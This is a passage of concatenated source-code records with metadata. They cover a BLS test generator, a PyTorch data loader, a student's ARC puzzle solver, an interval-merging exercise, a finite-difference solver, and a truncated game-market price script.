Iterable[gen_typing.TestCase]:\n for data in test_case_fn():\n print(data)\n (case_name, case_content) = data\n yield gen_typing.TestCase(\n fork_name=PHASE0,\n runner_name='bls',\n handler_name=handler_name,\n suite_name='small',\n case_name=case_name,\n case_fn=lambda: [('data', 'data', case_content)]\n )\n\n return gen_typing.TestProvider(prepare=prepare_fn, make_cases=cases_fn)\n\n\nif __name__ == \"__main__\":\n gen_runner.run_generator(\"bls\", [\n create_provider('sign', case01_sign),\n create_provider('verify', case02_verify),\n create_provider('aggregate', case03_aggregate),\n create_provider('fast_aggregate_verify', case04_fast_aggregate_verify),\n create_provider('aggregate_verify', case05_aggregate_verify),\n ])\n","sub_path":"tests/generators/bls/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"566565063","text":"import torch\nfrom torch.utils.data import DataLoader, Subset\nfrom torch_geometric.data import Batch\n\nfrom sklearn.model_selection import train_test_split\n\n\nclass MolecularDataLoader:\n r\"\"\"Data loader which merges data objects from a\n :class:`torch_geometric.data.dataset` to a mini-batch.\n\n Args:\n dataset (Dataset): The dataset from which to load the data.\n batch_size (int, optional): How many samples per batch to load.\n (default: :obj:`1`)\n shuffle (bool, optional): If set to :obj:`True`, the data will be\n reshuffled at every epoch. (default: :obj:`False`)\n follow_batch (list or tuple, optional): Creates assignment batch\n vectors for each key in the list. (default: :obj:`[]`)\n \"\"\"\n def __init__(self, hparams, dataset):\n self.hparams = hparams\n self.num_samples = len(dataset)\n self.dataset = dataset\n self.train_indices, self.val_indices = train_test_split(range(self.num_samples))\n\n def collate(self, data_list):\n return Batch.from_data_list(data_list)\n\n def get_train(self):\n dataset = Subset(self.dataset, self.train_indices)\n return DataLoader(\n dataset=dataset,\n collate_fn=lambda b: self.collate(b),\n batch_size=self.hparams.batch_size,\n shuffle=True,\n pin_memory=True,\n num_workers=self.hparams.num_workers)\n\n def get_val(self):\n dataset = Subset(self.dataset, self.val_indices)\n return DataLoader(\n dataset=dataset,\n collate_fn=lambda b: self.collate(b),\n batch_size=self.hparams.batch_size,\n shuffle=False,\n pin_memory=True,\n num_workers=self.hparams.num_workers)\n","sub_path":"tasks/autoencoding/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"17376749","text":"#!/usr/bin/python\n\"\"\"NUI Galway CT5148 Programming and Tools for AI (James McDermott)\n\nCT5148 Assignment 3: ARC\nStudent name(s): Alexey Shapovalov\nStudent ID(s): XXXXXXXX\nGitHub: https://github.com/alexs95/ARC\n\nChoice of Task\n---------------------------------------------------------------\nI looked through about 50 - 75 different tasks to decide which ones to implement.\nWhat I found out is that tasks that I found the hardest to solve were ones I could not\nfigure out the pattern to the solution. However, once I figured out the pattern, I\nalmost always figured they would be fairly easy to implement.\nAs examples to this point, these were the tasks I found the hardest to solve:\n6d0160f0 - this took one took the longest to figure out, was at it for at least 15 mins\n44f52bb0 - still not sure if I what I think the answer to this is correct\n68b16354 - convinced myself this one was a bug (looked purely random) before I finally figured it out\n6d58a25d - not sure why it took so long but could not figure it out\n99b1bc43 - I came up with very imaginative theories on what dictates\n the amount of lines coming out of the triangle\n\nInstead of choosing any of these, the criteria I judged the tasks \"difficulty\" was how hard\nI thought it would be to solve them programmatically.\nThe main \"feel\" for this difficulty was when I had to take a minute to figure out what\nit is I actually did to come up with a solution. Judging by this criteria, I would consider\nmuch easier to implement. For example, 68b16354 would be to swap rows.\n\n\nCode structure & GitHub\n---------------------------------------------------------------\nI did all my work on the assignment branch which I merged to master when I was complete.\nThe README contains contains comments about the purpose of this fork.\n\nThe code is laid out as follows:\n At first there are three classes representing different levels of abstraction\n about objects in the task. These provide an API for querying the input.\n Then each solve_ function with functions that are used in the solutions below\n each solve_ function.\n\n\nReflection\n---------------------------------------------------------------\nI would consider the main similarity between these (and all the other) tasks\npattern matching and interpretation of colors.\nAll of the challenges require you to figure out (the pattern) a set of transformations\nto the input grid by interpreting what the colors mean.\nYou have a set of examples to figure out this pattern. In my solution the\nthree classes contain transformations (and also the function downscale if it was\nimplemented more generally), could potentially be used for more than one task.\nThe method get_adjacency_collections would be an example of pattern matching.\nThe actual solutions would in a way contain the interpretation of the colors.\n\nSimilarities:\nInterpretation: All three solutions had a concept of a \"background\" on which\nstuff was happening.\n\nPattern matching: All three required understanding of the idea of the significance of\ncells of equal being color next to each other.\n\nTransformation: 0e206a2e and required understanding geometrical transformation concepts\n(but the transformations themselves were different).\n\nDifferences:\nThe most obvious difference is that the pattern to solve each task was different.\n\nThere was a concept of a path in b782dc8a.\n\n\nRelationship to Chollet paper\n---------------------------------------------------------------\nSadly as this was our second last assignment I was really stuck for time (could not start as soon\nas I liked as I had to finish previous ones). I only had a chance to skim through the paper so\nthis section might be taken with a pinch of salt.. possibly a lot of salt.\nI did want to give it a go. I will read it over Christmas properly for sure,\nI found it very interesting!\n\nMy interpretation of the goal of ARC dataset is to provide a dataset that if solved would represent\na more general artificial intelligence. It explains how state of the art applications of machine\nlearning are usually very specific to one narrow task, e.g. playing Go or chess,\nbut are not generally intelligent. The ARC dataset sets out to contain general\ntasks that would need to be a solved by an AI that is more generally intelligent.\nThe Chollet paper describes a set of priors that an entity can have to solve\nthese general tasks. I am thinking these would correspond to the similarities\nin my solutions. For example the concept of rotating, moving, recognising squares\netc. This would loosely correspond to the three classes at the start of my solution.\nThe actual solve_ functions would correspond to the use of these priors to solve the\ntasks, I guess this is what the AI would actually need to have understand.\n\n\"\"\"\n\nfrom itertools import combinations, product\nfrom collections import defaultdict\nfrom numpy import linalg\nimport numpy as np\nimport json\nimport os\nimport re\n\n\nclass ColouredPoint:\n \"\"\"An abstraction of a point in the input array providing utility methods and\n transformations on the point\"\"\"\n\n def __init__(self, x, y, color):\n self.x = x\n self.y = y\n self.color = color\n\n def euclidean(self, other):\n \"\"\"Euclidean distance between this and other\"\"\"\n return linalg.norm([self.x - other.x, self.y - other.y])\n\n def rotate(self, degrees):\n \"\"\"Returns a new point by rotating this one about the origin (0, 0) by the given degrees\"\"\"\n\n # Based on https://www.onlinemathlearning.com/transformation-review.html\n if degrees == 90:\n return ColouredPoint(x=-self.y, y=-self.x, color=self.color)\n elif degrees == 180:\n return ColouredPoint(x=-self.x, y=-self.y, color=self.color)\n elif degrees == 270:\n return ColouredPoint(x=self.y, y=-self.x, color=self.color)\n else:\n raise ValueError(\"Unsupported degrees: {}\".format(degrees))\n\n def reflect(self, axis):\n \"\"\"Returns a new point by reflecting this one across the given axis\"\"\"\n\n # Based on https://www.onlinemathlearning.com/transformation-review.html\n if axis == \"x\":\n return ColouredPoint(x=self.x, y=-self.y, color=self.color)\n elif axis == \"y\":\n return ColouredPoint(x=-self.x, y=self.y, color=self.color)\n elif axis == \"x=y\":\n return ColouredPoint(x=self.y, y=self.x, color=self.color)\n else:\n raise ValueError(\"Unsupported axis: {}\".format(axis))\n\n def __eq__(self, other):\n return self.x == other.x and self.y == other.y and self.color == other.color\n\n def __str__(self):\n return \"({}: ({}, {}))\".format(self.color, self.x, self.y)\n\n\nclass Collection:\n \"\"\"An abstraction representing a collection of points: provides information about the points\n and methods (transformations) that operate the collection as a whole.\n \"\"\"\n\n def __init__(self, points):\n points = list(points)\n self.points = points\n self.min_x = min(p.x for p in points)\n self.min_y = min(p.y for p in points)\n self.max_x = max(p.x for p in points)\n self.max_y = max(p.y for p in points)\n self.shape = (self.max_x - self.min_x + 1, self.max_y - self.min_y + 1)\n self.colors = set([p.color for p in points])\n\n def asnumpy(self, background=0):\n arr = np.full(self.shape, background)\n for p in self.points:\n arr[p.x - self.min_x][p.y - self.min_y] = p.color\n return arr\n\n def fill(self, arr, color=None):\n \"\"\"Fills arr (numpy array) with the points in this collection. If color is provided each point\n will be filled with color rather than the color of the point\n \"\"\"\n\n for point in self.points:\n arr[point.x][point.y] = color if color is not None else point.color\n\n def translate(self, source, destination):\n \"\"\"Translates each point in the collection defined by the translation\n from source (point) to destination (point)\n \"\"\"\n\n # Based on https://www.onlinemathlearning.com/transformation-review.html\n x_diff = destination.x - source.x\n y_diff = destination.y - source.y\n return Collection(\n ColouredPoint(x=p.x+x_diff, y=p.y+y_diff, color=p.color) for p in self.points\n )\n\n def rotate(self, degrees):\n return Collection(p.rotate(degrees) for p in self.points)\n\n def reflect(self, axis):\n return Collection(p.reflect(axis) for p in self.points)\n\n def __str__(self):\n return str(self.asnumpy())\n\n def __eq__(self, other):\n if len(other.points) == len(self.points):\n sorted_points = sorted(other.points, key=lambda p: (p.x, p.y, p.color))\n other_sorted_points = sorted(self.points, key=lambda p: (p.x, p.y, p.color))\n return all(a == b for (a, b) in zip(sorted_points, other_sorted_points))\n else:\n return False\n\n\nclass Grid:\n \"\"\"An abstraction representing a grid - provides information about arr and\n contains methods that return Collections and ColouredPoints\"\"\"\n def __init__(self, X):\n self.arr = X\n self.visited_mark = -1\n\n def colors(self):\n \"\"\"Returns a color frequency distribution as a dict\"\"\"\n unique, counts = np.unique(self.arr, return_counts=True)\n return {k: v for (k, v) in zip(unique, counts)}\n\n def get_points_by_color(self, color=None):\n \"\"\"Returns a Collection of all the points that have the same color\"\"\"\n points = []\n for x in range(self.arr.shape[0]):\n for y in range(self.arr.shape[1]):\n if self.arr[x][y] == color:\n points.append(ColouredPoint(x, y, color))\n return Collection(points)\n\n def get_adjacency_collections(self, avoid_color, match_color=None):\n \"\"\"Returns a list of Collection consisting of points that are not avoid_color and have\n at least one other neighbouring point on either the x-axis or the y-axis\n\n If match_color is set the points must be that color\n \"\"\"\n\n collections = []\n visited = np.zeros(self.arr.shape)\n for x in range(self.arr.shape[0]):\n for y in range(self.arr.shape[1]):\n collection = self._traverse(x, y, visited, avoid_color, match_color)\n if collection is not None:\n collections.append(Collection(collection))\n\n return collections\n\n def _traverse(self, x, y, visited, avoid_color, match_color):\n stop_condition = (\n x == -1 or x == self.arr.shape[0] or\n y == -1 or y == self.arr.shape[1] or\n self.arr[x][y] == avoid_color or\n visited[x][y] == self.visited_mark or\n (match_color is not None and self.arr[x][y] != match_color)\n )\n\n if not stop_condition:\n visited[x][y] = self.visited_mark\n point = ColouredPoint(x, y, self.arr[x][y])\n points = [point]\n for neighbour in ((x, y-1), (x, y+1), (x+1, y), (x-1, y)):\n nx, ny = neighbour\n new = self._traverse(nx, ny, visited, avoid_color, match_color)\n if new is not None:\n points += new\n\n return points\n\n return None\n\n\ndef solve_0e206a2e(X, background=0):\n \"\"\"I would consider this one to be the hardest of all my choices. It was not super easy\n to solve as a human (in comparison to others) but also the real difficulty was that\n even after thinking about it for a while, I was not fully sure of the exact steps\n I took in my head to solve it.\n\n The steps in my head for solving it are:\n 1. Find the shape(s) and the \"dots\" that the shapes need to be placed on.\n 2. Figure out which shape belongs to which set of \"dots\".\n 3. Move the shape(s) into the correct position, judging it by the dots.\n 4. Remove the old position of the shape(s).\n\n Algorithm:\n 1. The pattern here was that shapes would need to be connected by at least\n one neighbour on the horizontal or vertical. The way I figured out the\n reference \"dots\" was by creating sets of that that were closest together,\n my metric for closest was summed distance.\n 2. I brute forced this, just tried every possible combination\n of shape and set of \"dots\".\n 3. Move actually corresponded to transform.. you could also rotate, or flip\n before moving. Also brute forced this step by trying all possibilities\n of rotating and flipping until I found any match.\n 4. This was easily done by starting with a blank canvas for the solution.\n\n Tasks solved: All\n \"\"\"\n\n # 4) The solution will be on a blank canvas\n Y = np.full(X.shape, background)\n\n # Extract what is needed from the input\n X = Grid(X)\n collections = X.get_adjacency_collections(background)\n colors = X.colors()\n\n # 1.a) Find the target collections, these need to be transformed to match the location\n # of the corresponding reference points\n targets = [s for s in collections if len(s.colors) >= len(colors) - 1]\n\n # 1.b) Find the reference collections, the target collections\n # will be transformed based on these points\n references = find_references(s for s in collections if len(s.colors) < len(colors) - 1)\n\n # 2) Brute force search on all (target, reference) possibilities\n for target, reference in product(targets, references):\n # 3) Try to find a transformation that places the target on reference\n transformation = find_transformation(target, reference)\n if transformation is not None:\n # Draw the transformed collection in the correct location\n # if a valid transformation is found\n transformation.fill(Y)\n \n return Y\n\n\ndef find_references(collections):\n \"\"\"The reference points will be the set of points of unique colors that are nearest to each other.\n I defined \"nearest to each other\" as the nearest summed euclidean distance between each point\n \n collections - list of Collection - points to find references from (the collections\n will be flattened)\n \"\"\"\n \n references = []\n \n # Flatten collections to points\n points = [p for s in collections for p in s.points]\n \n # Greedily find the set of points that are unique in color and have minimum summed distance\n while len(points) != 0:\n support = find_best_reference_set(points)\n if len(support) > 1:\n references.append(Collection(support))\n points = [p for p in points if p not in support]\n\n return references\n\n\ndef find_best_reference_set(points):\n \"\"\"Finds the best set of points that have a minimum summed distance between each point\"\"\"\n\n # Group points by color\n grouped = defaultdict(list)\n for point in points:\n grouped[point.color].append(point)\n\n # Brute force search on all combinations of points with unique colors\n possibilities = product(*[grouped[key] for key in grouped])\n return min(possibilities, key=summed_distances)\n\n\ndef summed_distances(points):\n return sum(a.euclidean(b) for a, b in combinations(points, 2))\n\n\ndef find_transformation(target, reference):\n \"\"\"Finds a transformation of collection onto the points in the reference collection\"\"\"\n\n # Brute force search on all possible transformations\n for axis in (None, \"x\", \"y\", \"x=y\"):\n curr = target\n for degrees in (None, 90, 180, 270):\n if axis is not None:\n curr = curr.reflect(axis)\n if degrees is not None:\n curr = curr.rotate(degrees)\n\n # Find the reference points in target by matching them with the colors in the\n # reference collection\n target_reference = Collection([p for p in curr.points if p.color in reference.colors])\n\n # Apply the transformation of one point, to the rest of the points in the target collection\n corresponding = next(p for p in reference.points if p.color == target_reference.points[0].color)\n transformed = target_reference.translate(target_reference.points[0], corresponding)\n\n # If the resulting collection is identical to the reference point collection it is a match\n if transformed == reference:\n return curr.translate(target_reference.points[0], corresponding)\n\n return None\n\n\ndef solve_b782dc8a(X, wall=8):\n \"\"\"This task is very simple to solve as a human but harder to solve programmatically.\n\n The steps in my head for solving it are:\n 1. Identify the center point from which I would start the \"painting\".\n 2. Identify the second color in the every second one pattern judging it\n by the neighbouring cells that were not the colour of the wall.\n 3. Paint the background until I could not paint anymore.\n\n Algorithm:\n 1. The center point would be the only point with one color.\n 2. The pattern color would be the second least used color in the grid.\n 3. Painting is terminated when a wall is hit or the limits of the grid are reached.\n\n Tasks solved: All\n \"\"\"\n\n # Solution will be on a canvas identical to the input\n Y = X.copy()\n\n # Extract what is needed from the input\n X = Grid(X)\n colors = X.colors()\n # There will only be one center point, so only once cell will be colored\n # with the center color. Ideally there should be more than one outward points, otherwise\n # it is ambiguous which is the center. The code should work either way\n # by picking one at random if this happens.\n sorted_colors = sorted(colors.items(), key=lambda x: x[1])\n center_color, out_color = [c for c, _ in sorted_colors[:2]]\n center_point = X.get_points_by_color(center_color).points[0]\n color_transitions = {center_color: out_color, out_color: center_color}\n\n # Paint the pattern starting from the center point\n visited = np.zeros(X.arr.shape)\n paint(Y, (center_point.x, center_point.y), center_color, color_transitions, visited, wall)\n\n return Y\n\n\ndef paint(X, point, color, color_transitions, visited, wall):\n \"\"\"Recursively paints non-wall points starting from point by choosing the next color\n using the color_transitions dict. Points that are already visited are not re-painted.\n \"\"\"\n\n visited_mark = -1\n x, y = point\n\n stop_condition = (\n x == -1 or x == X.shape[0] or\n y == -1 or y == X.shape[1] or\n X[x][y] == wall or\n visited[x][y] == visited_mark\n )\n\n if not stop_condition:\n X[x][y] = color\n visited[x][y] = visited_mark\n for neighbour in ((x, y + 1), (x, y - 1), (x + 1, y), (x - 1, y)):\n paint(X, neighbour, color_transitions[color], color_transitions, visited, wall)\n\n\ndef solve_5ad4f10b(X, background=0):\n \"\"\"This task was not far off the difficulty of the first task done.\n It was mentioned as one of the examples provided. As a human it is very simple\n to solve but I struggled to come up with a pattern that was always true\n when differentiate which color was which.\n\n Note:\n All of the examples have an output of shape (3, 3) but as a human I would know how\n to solve the same problem with a (4, 4) or a (5, 5), etc. solution. I tried\n to make the code generalize to this.\n\n The steps in my head for solving it are:\n 1. Find the square of squares of equal size pattern.\n 2. Downscale the pattern so that each square is of size 1. Also change the color\n to the other color that is not the background.\n\n Algorithm:\n This one did not transfer as smoothly to the same steps when its solved programmatically,\n I will describe how the steps are achieved though:\n 1. This is handled by treating both colours as the color that contains the square of squares,\n some condition would fail in the process and nothing would be returned when the\n wrong color is attempted.\n 2. The size of each side would be the greatest common divisor of all the sides in the\n square of squares. Downscaling is done pretty much exactly as you would think,\n all squares are made a size of one.\n\n Tasks solved: All\n \"\"\"\n\n # Extract what is needed from the input\n X = Grid(X)\n colors = X.colors()\n del colors[background]\n\n # Get the bounding boxes of each unique color\n bounding_boxes = (Grid(X.get_points_by_color(c).asnumpy(background)) for c in colors.keys())\n\n for box, color in zip(bounding_boxes, colors.keys()):\n # Find adjacency collections for both the target color and the background\n targets = box.get_adjacency_collections(background, color)\n backgrounds = box.get_adjacency_collections(color, background)\n\n # The length of the sides of the squares will be the greatest common divisor\n # of all the sides in the square of squares\n sides = [t.shape[0] for t in targets] + [t.shape[1] for t in targets] + [box.arr.shape[0]]\n sides += [b.shape[0] for b in backgrounds] + [b.shape[1] for b in backgrounds]\n side = np.gcd.reduce(sides)\n\n # The fill color of the solution will be the only other color\n # (and not the background color)\n fill_color = next(c for c in colors.keys() if c != color)\n\n Y = downscale(box.arr, side, fill_color, background)\n if Y is not None:\n return Y\n\n\ndef downscale(box, side, fill_color, background):\n \"\"\"Downscales box by considering each box of length side as one pixel.\n If a downscaled pixel contains more than on color this returns None\"\"\"\n\n if side == 1:\n return None\n\n w, h = int(box.shape[0] / side), int(box.shape[1] / side)\n Y = np.full((w, h), background)\n\n for x in range(w):\n for y in range(h):\n square_color = get_square_color(box, x*side, y*side, side)\n if square_color is not None:\n if square_color != background:\n Y[x][y] = fill_color\n else:\n return None\n return Y\n\n\ndef get_square_color(box, x, y, side):\n \"\"\"Gets the color of the square with its top left corner at (x, y) and with the sides being a length of side\n Returns None if they are not all the same color or if side == 1\"\"\"\n\n colors = set()\n for i in range(side-1):\n for j in range(side-1):\n colors.add(box[x + i][y + j])\n if len(colors) == 1:\n return colors.pop()\n else:\n return None\n\n\n\ndef main():\n # Find all the functions defined in this file whose names are\n # like solve_abcd1234(), and run them.\n\n # regex to match solve_* functions and extract task IDs\n p = r\"solve_([a-f0-9]{8})\" \n tasks_solvers = []\n # globals() gives a dict containing all global names (variables\n # and functions), as name: value pairs.\n for name in globals(): \n m = re.match(p, name)\n if m:\n # if the name fits the pattern eg solve_abcd1234\n ID = m.group(1) # just the task ID\n solve_fn = globals()[name] # the fn itself\n tasks_solvers.append((ID, solve_fn))\n\n for ID, solve_fn in tasks_solvers:\n # for each task, read the data and call test()\n directory = os.path.join(\"..\", \"data\", \"training\")\n json_filename = os.path.join(directory, ID + \".json\")\n data = read_ARC_JSON(json_filename)\n test(ID, solve_fn, data)\n \ndef read_ARC_JSON(filepath):\n \"\"\"Given a filepath, read in the ARC task data which is in JSON\n format. Extract the train/test input/output pairs of\n grids. Convert each grid to np.array and return train_input,\n train_output, test_input, test_output.\"\"\"\n \n # Open the JSON file and load it \n data = json.load(open(filepath))\n\n # Extract the train/test input/output grids. Each grid will be a\n # list of lists of ints. We convert to Numpy.\n train_input = [np.array(data['train'][i]['input']) for i in range(len(data['train']))]\n train_output = [np.array(data['train'][i]['output']) for i in range(len(data['train']))]\n test_input = [np.array(data['test'][i]['input']) for i in range(len(data['test']))]\n test_output = [np.array(data['test'][i]['output']) for i in range(len(data['test']))]\n\n return (train_input, train_output, test_input, test_output)\n\n\ndef test(taskID, solve, data):\n \"\"\"Given a task ID, call the given solve() function on every\n example in the task data.\"\"\"\n print(taskID)\n train_input, train_output, test_input, test_output = data\n print(\"Training grids\")\n for x, y in zip(train_input, train_output):\n yhat = solve(x)\n show_result(x, y, yhat)\n print(\"Test grids\")\n for x, y in zip(test_input, test_output):\n yhat = solve(x)\n show_result(x, y, yhat)\n\n \ndef show_result(x, y, yhat):\n print(\"Input\")\n print(x)\n print(\"Correct output\")\n print(y)\n print(\"Our output\")\n print(yhat)\n print(\"Correct?\")\n # if yhat has the right shape, then (y == yhat) is a bool array\n # and we test whether it is True everywhere. if yhat has the wrong\n # shape, then y == yhat is just a single bool.\n print(np.all(y == yhat))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/manual_solve.py","file_name":"manual_solve.py","file_ext":"py","file_size_in_byte":25174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"69309125","text":"import unittest\n\ndef condense(arr):\n\tif arr is None:\n\t\treturn arr\n\t'''\n\t\tASSUMING THE INTERVAL IS COMPLETELY ENCLOSED/OVERLAPPED\n\t\t* What if (4,10), (5,12) --> would we say 4,12 or leave them separately?\n\t\tstart, end = 0, 0\n\t\ts, e = 1, 3\n\t\tif e < new_s\n\t\tappend s, e onto list\n\n\t\ts, e = 4, 10\n\t\tnew_s = 5\n\t\tnew_e = 8\n\t\tif e > new_e\n\t\t\tnext elm\t\t\n\t'''\n\tarr.sort()\n\tfixed = []\n\tfor s, e in arr:\n\t\tif not fixed:\n\t\t\tfixed.append((s,e))\n\t\tif s <= fixed[-1][1]:\n\t\t\tprev_s, prev_e = fixed[-1]\n\t\t\tfixed[-1] = (prev_s, max(prev_e, e))\n\t\telse:\n\t\t\tfixed.append((s,e))\n\treturn fixed\n\n\nclass Test(unittest.TestCase):\n\n\tdata = [([(1,3),(5,8),(4,10),(20,25)], [(1,3),(4,10),(20,25)])]\n\n\tdef test(self):\n\t\tfor case, expected in self.data:\n\t\t\tactual = condense(case)\n\t\t\tself.assertEqual(actual, expected)\n\nif __name__ == '__main__':\n\tunittest.main()\n","sub_path":"Problem_77/problem.py","file_name":"problem.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"204293956","text":"'''Finite difference solver'''\nimport numpy as np\nfrom .grid import Grid\nfrom .models.model import Model\nfrom .sinks.sink import Sink\n\n\nclass Solver(object):\n def __init__(self,\n simulation_times=[],\n reinitialization_iters=0,\n ):\n # Gettable variables\n self.simulation_times = simulation_times\n self._model = None\n self._grid = None\n self._reinitializer = None\n self._sinks = []\n self.reinitialization_iters = reinitialization_iters\n\n # Read-only variables\n self._elapsed_time = 0.0\n self._iterations = 0\n\n def simulate(self):\n if self.model is None:\n raise RuntimeError('No model has been set')\n if self.grid is None:\n raise RuntimeError('No grid has been set')\n if self._simulation_times == []:\n raise RuntimeError('No simulation times have been set')\n if self._simulation_times[0] != 0.0:\n self._simulation_times.insert(0, 0.0)\n\n # Initalize values\n self._elapsed_time = 0.0\n self._iterations = 0\n\n # Run all instant sinks initially\n for sink in self._sinks:\n sink(self.grid, self._elapsed_time)\n\n # While we do not halt\n while not self.halt():\n # Process the model\n self.model.process(self.grid)\n\n # Calculate dt\n dt = self.calculate_dt()\n\n # Perform grid update (TODO: Runge-Kutta)\n self.grid.data = self.grid.data - dt*self.model.H.data\n\n # Increment time\n self._elapsed_time += dt\n\n # Increment count\n self._iterations += 1\n\n # Run all instant sinks\n for sink in self._sinks:\n sink(self.grid, self._elapsed_time)\n\n # Reinitialization\n if self.reinitialization_iters != 0 \\\n and self.iterations % self.reinitialization_iters == 0 \\\n and self.reinitializer:\n self.reinitializer.grid = self.grid\n self.reinitializer.simulate()\n self.grid = self.reinitializer.grid\n\n def add_sink(self, new_sink):\n if not isinstance(new_sink, Sink):\n raise TypeError(\"Must provide wolff.sinks.sink.Sink subclass\")\n self._sinks.append(new_sink)\n\n def halt(self):\n return np.isclose(self.simulation_times[-1], self._elapsed_time) or \\\n self._elapsed_time > self.simulation_times[-1]\n\n def calculate_dt(self):\n\n for i in range(len(self._simulation_times)-1):\n if (self._elapsed_time >= self.simulation_times[i]) \\\n and (self._elapsed_time < self.simulation_times[i+1]):\n break\n\n dt = np.amin(np.array([\n self.model.dt,\n self._simulation_times[i+1] - self._elapsed_time]))\n\n return dt\n\n @property\n def model(self):\n return self._model\n\n @model.setter\n def model(self, value):\n if not isinstance(value, Model):\n raise TypeError(\"Must provide wolff.models.model.Model subclass\")\n self._model = value\n\n @property\n def grid(self):\n return self._grid\n\n @grid.setter\n def grid(self, value):\n if not isinstance(value, Grid):\n raise TypeError(\"Must provide wolff.grid.Grid subclass\")\n self._grid = value\n\n @property\n def reinitializer(self):\n return self._reinitializer\n\n @reinitializer.setter\n def reinitializer(self, value):\n if not isinstance(value, Solver):\n raise TypeError(\"Must provide wolff.solver.Solver subclass\")\n self._reinitializer = value\n\n @property\n def simulation_times(self):\n return self._simulation_times\n\n @simulation_times.setter\n def simulation_times(self, value):\n if type(value) is not list:\n value = [value]\n if any(n < 0 for n in value):\n raise ValueError(\"Cannot set simulation time to a negative number\")\n self._simulation_times = list(value)\n\n @property\n def reinitialization_iters(self):\n return self._reinitialization_iters\n\n @reinitialization_iters.setter\n def reinitialization_iters(self, value):\n if value < 0:\n raise ValueError(\"Cannot set reinitialization iterations to a\" +\n \" negative number\")\n self._reinitialization_iters = int(value)\n\n @property\n def iterations(self):\n return self._iterations\n\n @property\n def elapsed_time(self):\n return self._elapsed_time\n","sub_path":"wolff/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":4615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"327650114","text":"import requests\r\nimport re\r\nimport operator\r\nimport tkinter as tk\r\nimport time\r\n\r\nHeight = 300\r\nWidth = 500\r\npld_item = [31830, 31813]\r\nchest_items = [31868, 31832, 31862, 31850, 31856, 31844, 31838]\r\nfeet_items = [31853, 31859, 31847, 31835, 31841, 31871, 31865]\r\nhands_items = [31851, 31857, 31845, 31833, 31839, 31869, 31863]\r\nhead_items = [31831, 31861, 31837, 31867, 31849, 31855, 31843]\r\nleg_items = [31852, 31858, 31846, 31870, 31834, 31864, 31840]\r\nwaist_items = [31872, 31836, 31866, 31842, 31854, 31860, 31848]\r\nacc_items = [31885, 31887, 31883, 31886, 31884,\r\n 31875, 31877, 31873, 31876, 31874,\r\n 31880, 31882, 31878, 31881, 31879,\r\n 31890, 31892, 31888, 31891, 31889]\r\nweap_items = [31823, 31817, 31825, 31821,\r\n 31829,31819, 31828, 31816,\r\n 31820, 31815,31814, 31827,\r\n 31818, 31826, 31824,31822]\r\nitem_list = {\r\n}\r\nsearch = False\r\n\r\ndef api_grab(item_num):\r\n api_url = (\"https://universalis.app/api/Aether/\" + str(item_num))\r\n page = requests.get(api_url)\r\n page_data = page.json()\r\n refine1 = {key: page_data[key] for key in page_data.keys()\r\n & {\"listings\"}}\r\n\r\n for pro in refine1:\r\n new_dict = refine1[pro][4]\r\n refine2 = {key: new_dict[key] for key in new_dict.keys()\r\n & {\"pricePerUnit\"}}\r\n new1_entry = str(refine2)\r\n new2_entry = list(map(int, re.findall(r'\\d+', new1_entry)))\r\n new3_entry = new2_entry[0]\r\n return new3_entry\r\n\r\ndef search_best():\r\n i = 0\r\n while i < len(pld_item):\r\n item_num = (pld_item[i])\r\n world_price = api_grab(item_num)\r\n item_list[int(item_num)] = int(world_price / 21)\r\n i = i + 1\r\n i = 0\r\n\r\n while i < len(chest_items):\r\n item_num = (chest_items[i])\r\n world_price = api_grab(item_num)\r\n item_list[int(item_num)] = int(world_price / 42)\r\n i = i + 1\r\n i = 0\r\n\r\n while i < len(feet_items):\r\n item_num = (feet_items[i])\r\n world_price = api_grab(item_num)\r\n item_list[int(item_num)] = int(world_price / 33)\r\n i = i + 1\r\n i = 0\r\n\r\n while i < len(hands_items):\r\n item_num = (hands_items[i])\r\n world_price = api_grab(item_num)\r\n item_list[int(item_num)] = int(world_price / 33)\r\n i = i + 1\r\n i = 0\r\n\r\n while i < len(head_items):\r\n item_num = (head_items[i])\r\n world_price = api_grab(item_num)\r\n item_list[int(item_num)] = int(world_price / 33)\r\n i = i + 1\r\n i = 0\r\n\r\n while i < len(leg_items):\r\n item_num = (leg_items[i])\r\n world_price = api_grab(item_num)\r\n item_list[int(item_num)] = int(world_price / 42)\r\n i = i + 1\r\n i = 0\r\n\r\n while i < len(waist_items):\r\n item_num = (waist_items[i])\r\n world_price = api_grab(item_num)\r\n item_list[int(item_num)] = int(world_price / 21)\r\n i = i + 1\r\n i = 0\r\n\r\n while i < len(acc_items):\r\n item_num = (acc_items[i])\r\n world_price = api_grab(item_num)\r\n item_list[int(item_num)] = int(world_price / 21)\r\n i = i + 1\r\n i = 0\r\n\r\n while i < len(weap_items):\r\n item_num = (weap_items[i])\r\n world_price = api_grab(item_num)\r\n item_list[int(item_num)] = int(world_price / 21)\r\n i = i + 1\r\n\r\n\r\n sorted_d = dict( sorted(item_list.items(), key=operator.itemgetter(1)))\r\n best_prices = list(sorted_d.items())[:15]\r\n T.insert(tk.END, (\"\\nThe Cheapest items in order\"))\r\n\r\n T.insert(tk.END, (\"\\nuniversalis.app/market/\" + str(best_prices[0]).replace('(', '').replace(')', '').replace(',', '').replace(' ', ' PricePerToken: ')) + \\\r\n (\"\\nuniversalis.app/market/\" + str(best_prices[1]).replace('(', '').replace(')', '').replace(',', '').replace(' ', ' PricePerToken: ')) + \\\r\n (\"\\nuniversalis.app/market/\" + str(best_prices[2]).replace('(', '').replace(')', '').replace(',', '').replace(' ', ' PricePerToken: ')) + \\\r\n (\"\\nuniversalis.app/market/\" + str(best_prices[3]).replace('(', '').replace(')', '').replace(',', '').replace(' ', ' PricePerToken: ')) + \\\r\n (\"\\nuniversalis.app/market/\" + str(best_prices[4]).replace('(', '').replace(')', '').replace(',', '').replace(' ', ' PricePerToken: '))+ \\\r\n 